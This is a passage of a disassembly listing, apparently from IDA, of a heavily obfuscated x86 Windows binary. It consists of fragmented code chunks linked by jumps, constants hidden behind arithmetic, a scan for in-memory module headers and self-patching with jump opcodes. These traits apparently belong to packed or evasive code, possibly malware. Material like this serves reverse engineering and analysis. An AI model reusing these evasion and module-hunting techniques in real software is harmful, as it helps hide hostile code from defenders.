; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42873F
loc_42322F: ; CODE XREF: sub_42873F+17�j
neg eax
cmp ax, 0A5B3h
jnz loc_428748
retn
; END OF FUNCTION CHUNK FOR sub_42873F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_42323C: ; CODE XREF: sub_426354+16C7�j
; sub_427C9B+56�j
jmp loc_4262EB
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426211
loc_423241: ; CODE XREF: sub_426211+16�j
jmp loc_4250CF
; END OF FUNCTION CHUNK FOR sub_426211
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_423246: ; CODE XREF: sub_427486-1357�j
jmp loc_427921
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42873F
loc_42324B: ; CODE XREF: sub_42873F:loc_428748�j
sub ebx, 10000h
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jmp loc_4252D4
; END OF FUNCTION CHUNK FOR sub_42873F
; =============== S U B R O U T I N E =======================================
sub_42325E proc near ; DATA XREF: sub_423CDB+49D8�o
var_18 = dword ptr -18h
; FUNCTION CHUNK AT 0042314E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004231D4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423283 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423A82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423B46 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423DF6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00423E36 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00424261 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E6B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425205 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004269A0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426DF3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426F50 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426FE2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427140 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00427535 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004276C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004276F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427BBD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428372 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428B46 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00428EBF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428F20 SIZE 0000000C BYTES
push eax
pop ecx
call sub_425D27
loc_423265: ; CODE XREF: hjohnhn9:004280F1�j
jmp loc_427BBD
sub_42325E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D02
loc_42326A: ; CODE XREF: sub_4263E3:loc_426C9B�j
; sub_426D02+7F0�j
jmp loc_428DAB
; END OF FUNCTION CHUNK FOR sub_426D02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235C9
loc_42326F: ; CODE XREF: sub_4235C9:loc_426FC2�j
ror eax, 0Eh
mov ds:dword_4233A8, eax
retn
; END OF FUNCTION CHUNK FOR sub_4235C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B28
loc_423279: ; CODE XREF: sub_428B28+7�j
jmp sub_424877
; END OF FUNCTION CHUNK FOR sub_428B28
; ---------------------------------------------------------------------------
loc_42327E: ; CODE XREF: hjohnhn9:00425E01�j
jmp loc_4242C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_423283: ; CODE XREF: sub_42325E+BF4�j
rol eax, 0Eh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_423288: ; CODE XREF: sub_4262C5:loc_42762D�j
call sub_4246DB
; END OF FUNCTION CHUNK FOR sub_4262C5
; START OF FUNCTION CHUNK FOR sub_426A30
loc_42328D: ; CODE XREF: sub_426A30:loc_427181�j
add edx, 14h
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_4247C1
jmp loc_4288AD
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
loc_4232A1: ; CODE XREF: hjohnhn9:0042777A�j
mov byte ptr [ecx], 0E9h
pop ecx
add esi, 306850C2h
xchg esi, [esp]
jmp nullsub_1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_4232B4: ; CODE XREF: sub_4236A7+252�j
mov esi, [eax]
push esi
push 7F1739E3h
pop esi
add esi, 4759A1F6h
jmp loc_424F57
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428357
loc_4232C8: ; CODE XREF: sub_428357+7�j
xor [ebp-8], eax
call sub_4240BC
locret_4232D0: ; CODE XREF: sub_423E64-4B9�j
retn
; END OF FUNCTION CHUNK FOR sub_428357
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251EB
loc_4232D1: ; CODE XREF: sub_4251EB+E02�j
push esi
jl loc_426A8A
not esi
loc_4232DA: ; CODE XREF: sub_4251EB:loc_425FDC�j
and eax, 0ECD35A9h
call sub_423E64
locret_4232E5: ; CODE XREF: hjohnhn9:loc_423B39�j
retn
; END OF FUNCTION CHUNK FOR sub_4251EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_4232E6: ; CODE XREF: sub_425CB3+18�j
jmp loc_4240D4
; END OF FUNCTION CHUNK FOR sub_425CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_4232EB: ; CODE XREF: sub_4265CD-677�j
mov edi, eax
call sub_428DF9
; END OF FUNCTION CHUNK FOR sub_4265CD
; START OF FUNCTION CHUNK FOR sub_424631
loc_4232F2: ; CODE XREF: sub_424631-122F�j
jmp loc_4244BE
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
loc_4232F7: ; CODE XREF: hjohnhn9:loc_42500A�j
jnz loc_424D12
jmp loc_4268E0
; ---------------------------------------------------------------------------
loc_423302: ; DATA XREF: hjohnhn9:loc_424089�o
pop esi
mov [ebp-4], eax
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jnz loc_425BB8
jmp loc_424B6F
; ---------------------------------------------------------------------------
xchg ebx, [esi]
add ebp, ecx
jmp sub_428CE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42855B
loc_423320: ; CODE XREF: sub_42855B-2316�j
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_428B08
jmp loc_427707
; END OF FUNCTION CHUNK FOR sub_42855B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428183
loc_42332F: ; CODE XREF: sub_428183:loc_428B11�j
pop eax
cmp dword ptr [eax], 0
jnz loc_424EAA
jmp sub_427C43
; ---------------------------------------------------------------------------
loc_42333E: ; CODE XREF: sub_428183:loc_424EAA�j
push eax
push 0
call sub_428192
push offset sub_428183
jmp loc_42335C
; END OF FUNCTION CHUNK FOR sub_428183
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_423350: ; CODE XREF: sub_426354:loc_423451�j
jz loc_427951
jmp loc_4238BA
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
locret_42335B: ; CODE XREF: hjohnhn9:loc_4290E4�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428183
loc_42335C: ; CODE XREF: sub_428183-4E38�j
jmp sub_4264AC
; END OF FUNCTION CHUNK FOR sub_428183
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250FC
loc_423361: ; CODE XREF: sub_4250FC:loc_4268E0�j
shl edi, 1Eh
jmp loc_424D11
; END OF FUNCTION CHUNK FOR sub_4250FC
; =============== S U B R O U T I N E =======================================
sub_423369 proc near ; CODE XREF: hjohnhn9:0042651E�j
; sub_427564�p
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00423BE7 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
call sub_427363
push ecx
mov ecx, [esp+arg_C]
mov dword ptr [ecx], 10001h
lea eax, loc_423BFB
jmp loc_423BE7
sub_423369 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_423388: ; CODE XREF: sub_423BC3:loc_42713A�j
call sub_426638
pop es
aad 0D7h
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
dword_423390 dd 3628EFCEh ; DATA XREF: sub_424698+C5�r
; sub_427C9B+1174�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_423394: ; CODE XREF: sub_424819+1C8E�j
jmp loc_424967
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
db 0E2h, 7Ah, 0FEh
dword_42339C dd 6E65DF9Ch ; DATA XREF: sub_4263E3�r sub_427FDD+4�w
dword_4233A0 dd 34EFCC2Dh ; DATA XREF: sub_426708:loc_4261BC�r
; sub_426AF6+7�w
dword_4233A4 dd 0E8265DF9h ; DATA XREF: sub_426DFB-3960�w
; sub_4237F4+45DF�r
dword_4233A8 dd 59BDDF9Ch ; DATA XREF: sub_4235C9-357�w
dword_4233AC dd 736A377Eh, 16D2E9h, 0A6610D00h, 88EFCFEh, 1191E9h, 33E8100h
; DATA XREF: hjohnhn9:00425CE0�w
; hjohnhn9:00427E32�r
dword_4233C4 dd 0 ; DATA XREF: sub_428477:loc_4239D3�w
; sub_424A28:loc_424824�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_4233C8: ; CODE XREF: sub_426A78-4E6�j
jmp loc_4276FC
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
push eax
jmp sub_427E85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426924
loc_4233D3: ; CODE XREF: sub_426924+6�j
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
call sub_4269BD
; END OF FUNCTION CHUNK FOR sub_426924
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4233E1: ; CODE XREF: sub_423B05+5299�j
jmp loc_427A44
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_4233E6: ; CODE XREF: sub_4237F4:loc_4243ED�j
or dword ptr [eax-8], 4
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
mov edx, [ebp+arg_0]
jmp loc_424C46
; END OF FUNCTION CHUNK FOR sub_4237F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_4233F8: ; CODE XREF: sub_424631:loc_426894�j
cmp dword ptr [ebp-14h], 4
jnz loc_424F28
jmp loc_4232F2
; END OF FUNCTION CHUNK FOR sub_424631
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423408: ; CODE XREF: hjohnhn9:0042455F�j
jmp loc_4239B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278B9
loc_42340D: ; CODE XREF: sub_4278B9:loc_423948�j
call sub_423425
mov [ebp-4], eax
loc_423415: ; CODE XREF: sub_427E85-3CEB�j
; sub_427463+D�j ...
mov eax, [ebp-1Ch]
call sub_427F90
mov [ebp-8], eax
jmp loc_4282CE
; END OF FUNCTION CHUNK FOR sub_4278B9
; =============== S U B R O U T I N E =======================================
sub_423425 proc near ; CODE XREF: sub_4278B9:loc_42340D�p
; sub_426CC8+4�p ...
; FUNCTION CHUNK AT 004278D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282D8 SIZE 0000000B BYTES
jns sub_428477
push ebp
mov ebp, esp
jmp loc_4278D7
sub_423425 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_423433: ; CODE XREF: sub_427C9B:loc_427E76�j
jz loc_427C63
cmp eax, 3B5A44D1h
jmp loc_424496
; END OF FUNCTION CHUNK FOR sub_427C9B
; =============== S U B R O U T I N E =======================================
sub_423444 proc near ; DATA XREF: sub_4275F9+16�o
; FUNCTION CHUNK AT 004270EE SIZE 00000013 BYTES
call sub_42345B
jmp loc_4270EE
sub_423444 endp
; ---------------------------------------------------------------------------
loc_42344E: ; CODE XREF: hjohnhn9:loc_428440�j
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_423451: ; CODE XREF: sub_426354+1767�j
jmp loc_423350
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F3F
loc_423456: ; CODE XREF: sub_425F3F+9�j
jmp loc_4244EE
; END OF FUNCTION CHUNK FOR sub_425F3F
; =============== S U B R O U T I N E =======================================
sub_42345B proc near ; CODE XREF: sub_423444�p
; sub_424161:loc_424521�j ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424145 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004243BD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426B55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426FCF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042827F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428522 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00428892 SIZE 0000001B BYTES
push ecx
mov ecx, ebp
xchg ecx, [esp+4+var_4]
jmp loc_426FCF
sub_42345B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_423466: ; CODE XREF: sub_4262C5:loc_424ADE�j
mov al, [eax]
mov [ebp-9], al
push offset sub_428D64
jmp loc_4251E6
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
mov eax, [ebp-4]
jns loc_42410C
push esi
push 3EE8867Dh
pop esi
rol esi, 10h
xor esi, 867D3EC0h
add eax, esi
jmp loc_424089
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DFB
loc_423495: ; CODE XREF: sub_426DFB:loc_4234A2�j
xchg ebp, [esp+0]
ror eax, 12h
mov ds:dword_4233A4, eax
retn
; ---------------------------------------------------------------------------
loc_4234A2: ; CODE XREF: sub_426DFB:loc_426E02�j
jmp loc_423495
; END OF FUNCTION CHUNK FOR sub_426DFB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250FC
loc_4234A7: ; CODE XREF: sub_4250FC+15�j
jmp loc_426912
; END OF FUNCTION CHUNK FOR sub_4250FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240BC
loc_4234AC: ; CODE XREF: sub_4240BC+13�j
jmp nullsub_7
; END OF FUNCTION CHUNK FOR sub_4240BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4234B1: ; CODE XREF: sub_424161:loc_4279DE�j
push eax
push 0EB0820C5h
pop eax
and eax, 6CD12092h
jmp loc_429022
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
loc_4234C3: ; CODE XREF: hjohnhn9:0042798F�j
push ebp
cdq
jmp loc_42750E
; =============== S U B R O U T I N E =======================================
sub_4234CA proc near ; CODE XREF: sub_427B51+62D�j
push ebp
mov eax, [ebp-20h]
call sub_424A78
sub_4234CA endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423FB9
loc_4234D3: ; CODE XREF: sub_423FB9+F�j
; sub_4260BD-201A�j
jmp nullsub_6
; END OF FUNCTION CHUNK FOR sub_423FB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_4234D8: ; CODE XREF: sub_426475:loc_423027�j
call sub_4260BD
mov ebx, eax
call sub_424AAE
xor ebx, eax
mov [ebp-0Ch], ebx
push eax
mov eax, ecx
jmp loc_425E69
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D17
loc_4234F1: ; CODE XREF: sub_426D17+13�j
mov ds:dword_425AE8, eax
call sub_424877
mov edx, 0A2CD59D9h
call sub_427C53
; END OF FUNCTION CHUNK FOR sub_426D17
; START OF FUNCTION CHUNK FOR sub_423B05
loc_423505: ; CODE XREF: sub_423B05-A31�j
mov ds:dword_4252D0, eax
retn
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_42350B: ; CODE XREF: sub_428271-41FB�j
jmp loc_4280F6
; END OF FUNCTION CHUNK FOR sub_428271
; ---------------------------------------------------------------------------
jmp loc_428050
; ---------------------------------------------------------------------------
loc_423515: ; CODE XREF: hjohnhn9:00425DD3�j
call sub_424877
jmp loc_4237EF
; =============== S U B R O U T I N E =======================================
sub_42351F proc near ; CODE XREF: sub_425EA9-16A2�p
; FUNCTION CHUNK AT 00425D42 SIZE 00000005 BYTES
push ebx
push ecx
push offset loc_424904
jmp loc_425D42
sub_42351F endp
; ---------------------------------------------------------------------------
loc_42352B: ; CODE XREF: hjohnhn9:00427AB0�j
cdq
pop esi
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_42352D: ; CODE XREF: sub_4265CD:loc_427A9C�j
add eax, 8D6353E5h
loc_423533: ; CODE XREF: hjohnhn9:loc_428F2C�j
mov eax, [eax]
or eax, eax
jnz loc_425F4D
jmp loc_424449
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
loc_423542: ; CODE XREF: hjohnhn9:004245B5�j
jnb loc_4238C1
; =============== S U B R O U T I N E =======================================
sub_423548 proc near ; CODE XREF: sub_424631+3344�p
xchg ecx, [esp+0]
pop ecx
call sub_424A28
loc_423551: ; CODE XREF: sub_4262C5:loc_423C0D�j
jmp loc_427569
sub_423548 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423556: ; CODE XREF: hjohnhn9:00425B9D�j
or edi, 0E6A75A88h
; =============== S U B R O U T I N E =======================================
sub_42355C proc near ; CODE XREF: sub_4266B5:loc_424913�p
; FUNCTION CHUNK AT 00424E9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425C18 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425C40 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425E06 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042607D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042743B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428542 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
push 0A97A0725h
pop eax
xor eax, 0B4A5B546h
jmp loc_42743B
sub_42355C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427345
loc_423571: ; CODE XREF: sub_427345:loc_42742C�j
pop ecx
add esi, 0D0CC96EAh
and esi, 0DA1BA739h
xor esi, 0D81BA029h
xchg esi, [esp-4+arg_0]
push offset sub_4240AE
jmp loc_424FE8
; END OF FUNCTION CHUNK FOR sub_427345
; ---------------------------------------------------------------------------
loc_423591: ; CODE XREF: hjohnhn9:loc_425B52�j
and eax, edx
jmp loc_428DA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0B
loc_423598: ; CODE XREF: sub_428F0B+6�j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push offset sub_4263E3
jmp nullsub_128
; END OF FUNCTION CHUNK FOR sub_428F0B
; ---------------------------------------------------------------------------
mov eax, [ebp+0]
jmp loc_4244FA
; ---------------------------------------------------------------------------
loc_4235B0: ; DATA XREF: sub_423B6C+30CB�o
mov eax, [ebp+8]
test byte ptr [eax-7], 10h
jz loc_427A6C
inc dword ptr [ebp-8]
; START OF FUNCTION CHUNK FOR sub_426BD2
loc_4235C0: ; CODE XREF: sub_426BD2+8�j
; sub_427B7A:loc_42856C�j
mov eax, [ebp-8]
pop ecx
loc_4235C4: ; CODE XREF: hjohnhn9:loc_423977�j
jmp loc_427A69
; END OF FUNCTION CHUNK FOR sub_426BD2
; =============== S U B R O U T I N E =======================================
sub_4235C9 proc near ; CODE XREF: hjohnhn9:00427871�j
; hjohnhn9:00428C3A�p
; FUNCTION CHUNK AT 0042326F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426FC2 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push edi
mov edi, eax
xchg edi, [esp+0]
jmp loc_426FC2
sub_4235C9 endp
; =============== S U B R O U T I N E =======================================
sub_4235D8 proc near ; CODE XREF: hjohnhn9:00423C51�p
; hjohnhn9:00427068�j
; FUNCTION CHUNK AT 00427EA6 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov ds:dword_423944, eax
xor eax, eax
jmp loc_427EA6
sub_4235D8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, 17B3C1CFh
push ebp
mov ebp, eax
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_4235F0: ; CODE XREF: sub_4265CD:loc_425D6F�j
xchg ebp, [esp+0]
push 9622C161h
pop eax
xor eax, 94EB5D2Ah
jmp loc_428576
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
loc_423604: ; CODE XREF: hjohnhn9:004290EC�j
jg loc_428892
pop ebx
jmp sub_42859A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428788
loc_423610: ; CODE XREF: sub_428788+18�j
call sub_4244F5
mov esp, ebp
pop ebp
push ds:dword_423954
retn
; END OF FUNCTION CHUNK FOR sub_428788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426C09
loc_42361F: ; CODE XREF: sub_426C09:loc_424891�j
jl loc_428DA6
jmp loc_425E6E
; END OF FUNCTION CHUNK FOR sub_426C09
; =============== S U B R O U T I N E =======================================
sub_42362A proc near ; CODE XREF: hjohnhn9:00423A93�j
; sub_426F5A-1324�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042911D SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg edx, [esp-4+arg_0]
ror eax, 12h
mov ds:dword_428B18, eax
jmp loc_42911D
sub_42362A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42363F proc near ; CODE XREF: sub_42897B�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00424860 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424B8A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424FB4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00425C7D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004265C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426FB8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426FC7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427491 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004279BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004289FD SIZE 00000007 BYTES
push ebp
loc_423640: ; CODE XREF: hjohnhn9:loc_427480�j
mov ebp, esp
push ecx
jmp loc_4279BB
sub_42363F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_423648: ; CODE XREF: sub_423B05+43EB�j
js loc_427BFB
test edx, ebp
jmp loc_423C5B
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_423655 proc near ; CODE XREF: sub_424B30+A�p
; hjohnhn9:00424CC3�j
xchg ecx, [esp+0]
pop ecx
loc_423659: ; CODE XREF: sub_423B05:loc_423C5B�j
mov esp, ebp
pop ebp
retn
sub_423655 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_42365D: ; CODE XREF: sub_426F5A-30B0�j
jmp loc_425C33
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_423662: ; CODE XREF: sub_424631:loc_427DB3�j
cmp dword ptr [ebp-10h], 1
jnz loc_428C75
jmp loc_428C5E
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42636C
loc_423671: ; CODE XREF: sub_42636C+B�j
xor ecx, 322A975Dh
add ecx, 0BFC07BFDh
xor ecx, 5EE2BF7Dh
add ecx, 26B6512Fh
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42636C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_42368D: ; CODE XREF: sub_424631-14A9�j
jmp nullsub_81
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_423692: ; CODE XREF: sub_42851A-1D45�j
rol eax, 11h
jmp loc_42471C
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_42369A: ; CODE XREF: sub_4287BF:loc_423022�j
mov [ebp-8], eax
push offset sub_4250FC
jmp nullsub_114
; END OF FUNCTION CHUNK FOR sub_4287BF
; =============== S U B R O U T I N E =======================================
sub_4236A7 proc near ; DATA XREF: hjohnhn9:00428A0A�o
; FUNCTION CHUNK AT 00423087 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004232B4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004238EB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00423BF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424BAE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424F57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425D7B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042706D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00429027 SIZE 0000000B BYTES
push ebp
pop edx
xchg edx, [esp+0]
mov ebp, esp
push ecx
push ebp
mov eax, [ebp+8]
mov ecx, [eax]
jmp loc_423BF6
sub_4236A7 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_4236BB: ; CODE XREF: sub_423BC3+1F�j
jz loc_42782B
sub eax, 4DABBFC6h
pushf
jmp loc_426A84
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
mov ds:dword_428AF0, eax
cmp ds:dword_428AF0, 0
jnz loc_426FAD
jmp loc_427FE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423D67
loc_4236E4: ; CODE XREF: sub_423D67:loc_423CC8�j
or edi, 4F1F9639h
xor edi, 0A0E06186h
xchg edi, [esp+0]
push ebx
push eax
jmp loc_423201
; END OF FUNCTION CHUNK FOR sub_423D67
; ---------------------------------------------------------------------------
dw 0E6C1h
dd 6D830F15h, 0E8FFFFFAh, 47Ch, 2A108A0Fh, 0D2F70000h
; CODE XREF: sub_426D6A+17�j
; hjohnhn9:00426D4A�j
dd 5A486852h, 815A70AEh, 9A6ACACAh, 0E1EA813Ch, 810E56BBh
dd 0A875E1C2h, 2C4FE9FDh, 0C870000h, 0C875924h, 0FDD6E924h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426749
loc_42373A: ; CODE XREF: sub_426749+1ACC�j
xor edx, edx
call sub_427AEB
loc_423741: ; CODE XREF: sub_426749+2709�j
mov eax, ds:dword_426E6C
mov [ebp-4], eax
push offset sub_426C5D
jmp nullsub_89
; END OF FUNCTION CHUNK FOR sub_426749
; =============== S U B R O U T I N E =======================================
sub_423753 proc near ; CODE XREF: sub_4260BD:loc_426D9D�p
; hjohnhn9:00428E2D�j
; FUNCTION CHUNK AT 00425CF5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427229 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428BAA SIZE 00000002 BYTES
xchg ecx, [esp+0]
pop ecx
cmp dword ptr [ebp-8], 0
jz loc_427951
jmp loc_425CF5
sub_423753 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_423767: ; CODE XREF: sub_4287BF+1C�j
jmp loc_429061
; END OF FUNCTION CHUNK FOR sub_4287BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CE6
loc_42376C: ; CODE XREF: sub_426CE6+1701�j
jmp nullsub_55
; END OF FUNCTION CHUNK FOR sub_426CE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
